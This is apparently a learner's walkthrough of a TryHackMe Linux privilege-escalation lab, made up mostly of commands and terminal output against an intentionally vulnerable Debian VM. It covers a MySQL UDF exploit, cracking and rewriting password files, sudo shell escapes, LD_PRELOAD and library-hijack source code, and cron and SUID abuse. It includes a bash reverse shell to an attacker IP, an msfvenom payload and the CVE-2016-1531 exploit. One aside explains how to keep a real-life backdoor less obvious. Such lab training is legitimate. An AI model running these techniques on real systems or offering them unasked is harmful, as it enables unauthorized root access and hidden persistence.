LEARN >> Linux PrivEsc

Table of Contents

URL: https://tryhackme.com/room/linuxprivesc

This room explains some common methods of escalating privileges on Linux systems. This serves as a good place to start if you are stuck as a certain user and need to either upgrade or step laterally to another user.

Task 1 – Deploy the Vulnerable Debian VM

Run the 'id' command. What is the result?

Task 2 – Service Exploits

MySQL is running as "root" and the root user on MySQL does not have a password set. We can use a popular exploit that takes use of User Defined Functions (UDFs) to run system commands as root via the MySQL service.

Change into the /home/user/tools/mysql-udf directory
Compile the raptor_udf2.c exploit using the following commands:

gcc -g -c raptor_udf2.c -fPIC  
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Connect to the MySQL service as root, password is blank:

mysql -u root

Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:

use mysql;  
create table foo(line blob);  
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));  
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';  
create function do_system returns integer soname 'raptor_udf2.so';

Use the below command to copy /bin/bash to /tmp/rootbash and set the SUID permissions:

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Exit out of MySQL (type exit or \q and press Enter) then run the SUID bash copy /tmp/rootbash with the parameter -p to gain a shell running with root privileges:

/tmp/rootbash -p

The exploit!

user@debian:~$ cd /home/user/tools/mysql-udf
user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC  
<g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.                                     <g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
user@debian:~/tools/mysql-udf$ mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.1.73-1+deb6u1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use mysql;  
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);  
Query OK, 0 rows affected (0.27 sec)

mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));  
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';  
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
+------------------------------------------------------------------+
| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
+------------------------------------------------------------------+
|                                                                0 |
+------------------------------------------------------------------+
1 row in set (0.01 sec)

mysql> /q

user@debian:~$ /tmp/rootbash -p
root@debian:/usr/share/man# id
uid=0(root) gid=0(root) groups=0(root)

Task 3 – Weak File Permissions – Readable /etc/shadow

An /etc/shadow file that is world-readable is dangerous… the /etc/shadow file is where Linux stores it’s users and passwords (which are encrypted). Because the passwords are encrypted, doesn’t mean that we cannot break them… especially if the user has used a simple password…

The /etc/shadow file contains user password hashes and is usually readable only by root… note that on this VM it is world-readable:

user@debian:~/tools/mysql-udf$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25  2019 /etc/shadow

View the contents of the /etc/shadow file:

user@debian:~/tools/mysql-udf$ cat /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
sync:*:17298:0:99999:7:::
games:*:17298:0:99999:7:::
man:*:17298:0:99999:7:::
lp:*:17298:0:99999:7:::
mail:*:17298:0:99999:7:::
news:*:17298:0:99999:7:::
uucp:*:17298:0:99999:7:::
proxy:*:17298:0:99999:7:::
www-data:*:17298:0:99999:7:::
backup:*:17298:0:99999:7:::
list:*:17298:0:99999:7:::
irc:*:17298:0:99999:7:::
gnats:*:17298:0:99999:7:::
nobody:*:17298:0:99999:7:::
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::

Each line represents a user. A user’s password hash (if they have one) can be found between the first and second colons (:) of each line.

Save the root users hash to a file called hash.txt and use John The Ripper to crack it with rockyou.txt – the famous plaintext list of passwords with over 14 million commonly used passwords:

❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt                   
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (root)
1g 0:00:00:01 DONE (2021-11-24 16:57) 0.8547g/s 1312p/s 1312c/s 1312C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Switch to the root user, using the cracked password:

user@debian:~/tools/mysql-udf$ su root
Password: 
root@debian:/home/user/tools/mysql-udf#

What is the root user's password hash?

What hashing algorithm was used to produce the root user's password hash?

What is the root user's password?

Task 4 – Weak File Permissions – Writeable /etc/shadow

As much as an /etc/shadow file that is world-readable is dangerous… an /etc/shadow file that is world-writeable is 100x worse… this allows ANYONE with access to modify ANY passwords stored in this file. In 3 easy steps we can overwite the root users password with whatever we want, and no one would be the wiser (until someone tries to access that root account with the old password anyway…)

The /etc/shadow file on this VM is word-writeable:

user@debian:~/tools/mysql-udf$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25  2019 /etc/shadow

Generate a new password hash with a password of your choice:

user@debian:~/tools/mysql-udf$ mkpasswd -m sha-512 pwn3d
$6$w1DLfTWkp2iep$P1rdUJ.aGUsX1v66DRwjMI.HKipURmgJ9rq7uQcKhRFZPzDtHgIU7yE09YbWPicDffVyW8AVx/y20xHvAnLxO0

Edit the /etc/shadow file and replace the original root hash with the one generated above, then switch to root:

user@debian:~/tools/mysql-udf$ vi /etc/shadow
"/etc/shadow" 24L, 842C written
user@debian:~/tools/mysql-udf$ su root
Password: 
root@debian:/home/user/tools/mysql-udf#

Task 5 – Weak File Permissions – Writeable /etc/passwd

The /etc/passwd file contains information about user accounts. It is world-readable by default, but is usually only writeable by root. Historically, the /etc/passwd file contained the users password hashes, and some versions of Linux still allow password hashes to be stored there.

Note that the /etc/passwd file is world-writeable:

user@debian:~/tools$ ls -l /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25  2019 /etc/passwd

Generate a new password hash with a password of your choice:

user@debian:~/tools$ openssl passwd l33t
XlfiGiQKUvlVE

Edit the /etc/shadow file and either replace the x between the first and second colon on the root account line, or better still copy the whole line to the bottom of the file, change root to something else and paste the generated password between the first and second colons:

stimpz:XlfiGiQKUvlVE:0:0:root:/root:/bin/bash

"/etc/passwd" 25L, 1055C written

user@debian:~/tools$ su stimpz
Password: 
root@debian:/home/user/tools# id
uid=0(root) gid=0(root) groups=0(root)

Run the 'id' command as the newroot user. What is the result?

Task 6 – Sudo – Shell Escape Sequences

List the programs which sudo allows your user to run:

user@debian:~/tools$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more

Use GTFOBins and search for the program names, if the program is listed with "sudo" as a function, you can use it to elevate privileges, usually via an escape sequence.

For an extra challenge, try to gain a root shell using all the programs on the list!

iftop

user@debian:~$ sudo iftop
interface: eth0
IP address is: 10.10.127.35
MAC address is: 02:2c:1a:3c:85:ff

!/bin/bash

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user#

find

user@debian:~$ sudo find . -exec /bin/bash \; -quit
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

nano

user@debian:~$ sudo nano

Ctrl-R / Ctrl-X
reset; bash 1>&0 2>&0

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

vim

user@debian:~$ sudo vim -c ':!/bin/bash'

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

man

user@debian:~$ sudo man man

!/bin/bash

root@debian:/usr/share/man# id
uid=0(root) gid=0(root) groups=0(root)

awk

user@debian:~$ sudo awk 'BEGIN {system("/bin/bash")}'
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

less

user@debian:~$ sudo less /etc/profile

!/bin/bash

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

ftp

user@debian:~$ sudo ftp
ftp> !/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

nmap

user@debian:~$ sudo nmap --interactive

Starting Nmap V. 5.00 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !/bin/bash
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

/bin/more

user@debian:~$ TERM= sudo more /etc/profile

!/bin/bash   

root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

NOTE: the apache2 sudo method is covered in the topic below, it’s not your usual standard shell escape GTFOBins-style exploit.

How many programs is 'user' allowed to run via sudo?

One program on the list doesn't have a shell escape sequence on GTFOBins. Which is it?

Task 7 – Sudo – Environment Variables

Sudo can be configured to inherit certain environment variables from the user’s environment.

Check which environment variables are inherited (look for the env_keep options):

user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more

LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user’s environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

Create a shared object using the code located at /home/user/tools/sudo/preload.c:

user@debian:~$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
user@debian:~$

Run one of the programs you are allowed to run via sudo, while setting the LD_PRELOAD environment variable to the full path of the new shared object:

user@debian:~$ sudo LD_PRELOAD=/tmp/preload.so apache2
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

Run ldd /usr/sbin/apache2:

user@debian:~$ ldd /usr/sbin/apache2
    linux-vdso.so.1 =>  (0x00007fffe3bb4000)
    libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fd7c7843000)
    libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fd7c761f000)
    libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fd7c73e5000)
    libpthread.so.0 => /lib/libpthread.so.0 (0x00007fd7c71c9000)
    libc.so.6 => /lib/libc.so.6 (0x00007fd7c6e5d000)
    libuuid.so.1 => /lib/libuuid.so.1 (0x00007fd7c6c58000)
    librt.so.1 => /lib/librt.so.1 (0x00007fd7c6a50000)
    libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fd7c6819000)
    libdl.so.2 => /lib/libdl.so.2 (0x00007fd7c6614000)
    libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fd7c63ec000)
    /lib64/ld-linux-x86-64.so.2 (0x00007fd7c7d00000)

Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c:

user@debian:~$ gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
user@debian:~$

Run apache2 using sudo, while settings the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object):

user@debian:~$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: /tmp/libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0)
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

A root shell should spawn.

Try renaming /tmp/libcrypt.so.1 to the name of another library used by apache2 and re-run apache2 using sudo again. Did it work? If not, try to figure out why not, and how the library_path.c code could be changed to make it work.

user@debian:~/tools/sudo$ mv /tmp/libcrypt.so.1 /tmp/libpcre.so.3
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: symbol lookup error: apache2: undefined symbol: pcre_free
user@debian:~/tools/sudo$ mv /tmp/libpcre.so.3 /tmp/libuuid.so.1
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=/tmp apache2
apache2: /tmp/libuuid.so.1: no version information available (required by /usr/lib/libapr-1.so.0)
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)

SOURCE >> library_path.c

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

SOURCE >> preload.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

Task 8 – Cron Jobs – File Permissions

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

View the contents of the system-wide crontab:

user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh

Locate the full path of the overwrite.sh file:

user@debian:~$ locate overwrite.sh
/usr/local/bin/overwrite.sh

Note that the file is world-writeable:

user@debian:~$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh

Replace the contents over the overwrite.sh file with the following, change the IP to the VPN IP and port to match – open up a netcat listener on your attackbox using the port given below:

user@debian:/usr/local/bin$ echo '#!/bin/bash' > overwrite.sh
user@debian:/usr/local/bin$ echo 'bash -i >& /dev/tcp/10.9.2.201/1337 0>&1' >> overwrite.sh
user@debian:/usr/local/bin$ cat overwrite.sh 
#!/bin/bash
bash -i >& /dev/tcp/10.9.2.201/1337 0>&1
user@debian:/usr/local/bin$ 

❯ nc -lnvp 1337
Connection from 10.10.200.127:34634
bash: no job control in this shell
root@debian:~# id
id
uid=0(root) gid=0(root) groups=0(root)

NOTE: Skipping that first echo command will instead of clearing the file out, leave the original code in the file… this would make it "less obvious" something has been backdoored, and is the preferred method of sneaking in a backdoor in real-life circumstances. This is especially the case when using the above command to spawn a shell, as it will stop the script from running any further until that shell dies. This task however directly specifies to "Replace the contents", so in that circumstance you must include that first echo to overwrite the contents of the file.

Task 9 – Cron Jobs – PATH Environment Variable

View the contents of the system-wide crontab /etc/crontab:

user@debian:/usr/local/bin$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

Notice the PATH includes the directory /home/user at the front? Because the line calling overwrite.sh does not have a path we can create our own malicious overwrite.sh and drop it in our home folder (which comes before the full path of overwrite.sh which is /usr/local/bin, hence it will run our script first)!

user@debian:~$ echo '#!/bin/bash' > ~/overwrite.sh
user@debian:~$ echo 'cp /bin/bash /tmp/rootbash' >> ~/overwrite.sh
user@debian:~$ echo 'chmod +xs /tmp/rootbash' >> ~/overwrite.sh
user@debian:~$ cat overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
user@debian:~$ chmod +x overwrite.sh
user@debian:~$ ls /tmp/rootbash
ls: cannot access /tmp/rootbash: No such file or directory
...
user@debian:~$ ls -l /tmp/rootbash
-rwsr-sr-x 1 root root 926536 Nov 24 03:20 /tmp/rootbash

Now to get a root shell, simply run /tmp/rootbash -p:

user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

What is the value of the PATH variable in /etc/crontab?

Task 10 – Cron Jobs – Wildcards

Let’s look at the other cron job script, compress.sh:

user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *

Notice the * (wildcard) at the end of the tar command?

Let’s take a look at GTFOBins page for tar: https://gtfobins.github.io/gtfobins/tar/

Tar has command line options that let you run other commands as part of a "checkpoint" feature.

Lets cook up a shell in msfvenom, then run nc to listen to the port we set:

❯ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f elf -o linl33t  
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: linl33t

❯ nc -lnvp 1337

Transfer it to the /home/user ("users" home directory) via scp:

❯ scp -oHostKeyAlgorithms=+ssh-rsa linl33t user@10.10.200.127:~
user@10.10.200.127's password: 
linl33t                                                  100%  194     0.6KB/s   00:00

On the target box, lets not forget to make it executable!:

user@debian:~$ chmod +x linl33t 
user@debian:~$

Now we will create two files in /home/user that match the command syntax tar would expect from it’s command line switches, to run linl33t (our MSFvenom reverse shell):

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=linl33t

… and magically, back on our attack box:

❯ nc -lnvp 1337
Connection from 10.10.200.127:34644
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
hostname
debian

Task 11 – SUID / SGID Executables – Known Exploits

Find all SUID / SGID executables:

user@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwxr-sr-x 1 root shadow 19528 Feb 15  2011 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 108600 Apr  2  2014 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 37552 Feb 15  2011 /usr/bin/chsh
-rwsr-xr-x 2 root root 168136 Jan  5  2016 /usr/bin/sudo
-rwxr-sr-x 1 root tty 11000 Jun 17  2010 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 35040 Dec 18  2010 /usr/bin/crontab
-rwsr-xr-x 1 root root 32808 Feb 15  2011 /usr/bin/newgrp
-rwsr-xr-x 2 root root 168136 Jan  5  2016 /usr/bin/sudoedit
-rwxr-sr-x 1 root shadow 56976 Feb 15  2011 /usr/bin/chage
-rwsr-xr-x 1 root root 43280 Feb 15  2011 /usr/bin/passwd
-rwsr-xr-x 1 root root 60208 Feb 15  2011 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39856 Feb 15  2011 /usr/bin/chfn
-rwxr-sr-x 1 root tty 12000 Jan 25  2011 /usr/bin/wall
-rwsr-sr-x 1 root staff 9861 May 14  2017 /usr/local/bin/suid-so
-rwsr-sr-x 1 root staff 6883 May 14  2017 /usr/local/bin/suid-env
-rwsr-sr-x 1 root staff 6899 May 14  2017 /usr/local/bin/suid-env2
-rwsr-xr-x 1 root root 963691 May 13  2017 /usr/sbin/exim-4.84-3
-rwsr-xr-x 1 root root 6776 Dec 19  2010 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 212128 Apr  2  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10592 Feb 15  2016 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 36640 Oct 14  2010 /bin/ping6
-rwsr-xr-x 1 root root 34248 Oct 14  2010 /bin/ping
-rwsr-xr-x 1 root root 78616 Jan 25  2011 /bin/mount
-rwsr-xr-x 1 root root 34024 Feb 15  2011 /bin/su
-rwsr-xr-x 1 root root 53648 Jan 25  2011 /bin/umount
-rwsr-sr-x 1 root root 926536 Nov 24 03:55 /tmp/rootbash
-rwxr-sr-x 1 root shadow 31864 Oct 17  2011 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 94992 Dec 13  2014 /sbin/mount.nfs

/usr/sbin/exim-4.84-4 is in the above list – this version is exploitable! A local privilege escalation exploit to be exact! (included in /home/user/tools/suid/exim/ named cve-2016-1531.sh).

Lets exploit it! 😉

user@debian:~$ /home/user/tools/suid/exim/cve-2016-1531.sh
[ CVE-2016-1531 local root exploit
sh-4.1# /bin/bash
root@debian:~# id
uid=0(root) gid=1000(user) groups=0(root)
root@debian:~#

Task 12 – SUID / SGID Executables – Shared Object Injection

From the previous search, we also have /usr/local/bin/suid-so – this is vulnerable to a shared object injection.

First, execute the file and note that currently it displays a progress bar before exiting:

user@debian:~$ suid-so
Calculating something, please wait...
[=====================================================================>] 99 %
Done.
user@debian:~$

Run strace on the file and search the output for open/access calls, and for "no such file" errors:

user@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY)       = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY)        = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY)    = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY)        = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)

Looking at the bottom line – it looks like suid-so looks for a file named libcalc.so in /home/user/.config/ (our home directory!)

Using the example shared object code in /home/user/tools/suid/ named libcalc.c (which simply calls a Bash shell), lets compile the code into a shared object at the location we found from suid-so above, and see what happens when we run suid-so now:

user@debian:~$ mkdir .config
user@debian:~$ gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c
user@debian:~$ suid-so
Calculating something, please wait...
bash-4.1# id
uid=0(root) gid=1000(user) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

SOURCE >> libcalc.c

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    setuid(0);
    system("/bin/bash -p");
}

Task 13 – SUID / SGID Executables – Environment Variables

Still looking into the available SUID/SGID binaries list we got from Task 11, we have another exploitable binary, /usr/local/bin/suid-env – this inherits the users PATH environment variable and is attempting to execute programs without a full path – this one is ripe for the picking!

First, lets run it and see what it is trying to do:

user@debian:~/tools/sudo$ suid-env
[....] Starting web server: apache2httpd (pid 1680) already running
. ok

OK… lets dig a bit deeper using strings:

user@debian:~/tools/sudo$ strings /usr/local/bin/suid-env
/lib64/ld-linux-x86-64.so.2
5q;Xq
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
service apache2 start

The last line – service apache2 start is not pointing to the full path of service (/usr/sbin/service) – lets compile some code from our home directory, that simply spawns a Bash shell, ironically (or not) called service.c… do you see where this is going yet? 🙂

user@debian:~$ gcc -o service /home/user/tools/suid/service.c
user@debian:~$

OK – now it’s showtime! 🙂

user@debian:~$ PATH=.:$PATH /usr/local/bin/suid-env
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

SOURCE >> service.c

int main() {
    setuid(0);
    system("/bin/bash -p");
}

Task 14 – SUID / SGID Executables – Abusing Shell Features (#1)

NOTE: This will not work on Bash versions above 4.2-048.

While still looking into the available SUID/SGID binaries list we got from Task 11, we also see /usr/local/bin/suid-env2 – this executable is identical to suid-env except it uses the absolute path of the services:

user@debian:~$ strings /usr/local/bin/suid-env2
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
/usr/sbin/service apache2 start

In Bash versions below 4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.

Let’s check our Bash version:

user@debian:~$ /bin/bash --version
GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
user@debian:~$

Yipee! Let’s create a bash function with the name "/usr/sbin/service" that creates a new Bash shell (using -p to preserve the root permissions) and export the function, then we run suid-env2 again and voila! 😉

user@debian:~$ function /usr/sbin/service { /bin/bash -p; }
user@debian:~$ export -f /usr/sbin/service
user@debian:~$ suid-env2
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

Task 15 – SUID / SGID Executables – Abusing Shell Features (#2)

NOTE: This will not work on Bash versions 4.4 and above.

When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.

Run the /usr/local/bin/suid-env2 executable with Bash debugging enabled, and the PS4 variable set to an embedded command that will create an SUID version of /bin/bash:

user@debian:~$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/usr/sbin/service apache2 start
basename /usr/sbin/service
VERSION='service ver. 0.91-ubuntu1'
basename /usr/sbin/service
USAGE='Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]'
SERVICE=
ACTION=
SERVICEDIR=/etc/init.d
OPTIONS=
'[' 2 -eq 0 ']'
cd /
'[' 2 -gt 0 ']'
case "${1}" in
'[' -z '' -a 2 -eq 1 -a apache2 = --status-all ']'
'[' 2 -eq 2 -a start = --full-restart ']'
'[' -z '' ']'
SERVICE=apache2
shift
'[' 1 -gt 0 ']'
case "${1}" in
'[' -z apache2 -a 1 -eq 1 -a start = --status-all ']'
'[' 1 -eq 2 -a '' = --full-restart ']'
'[' -z apache2 ']'
'[' -z '' ']'
ACTION=start
shift
'[' 0 -gt 0 ']'
'[' -r /etc/init/apache2.conf ']'
'[' -x /etc/init.d/apache2 ']'
exec env -i LANG= PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb /etc/init.d/apache2 start
Starting web server: apache2httpd (pid 1680) already running
.
user@debian:~$ ls -al /tmp/rootbash
-rwsr-sr-x 1 root root 926536 Nov 24 05:03 /tmp/rootbash

Then as before, it’s as simple as running this, and we are root!

user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
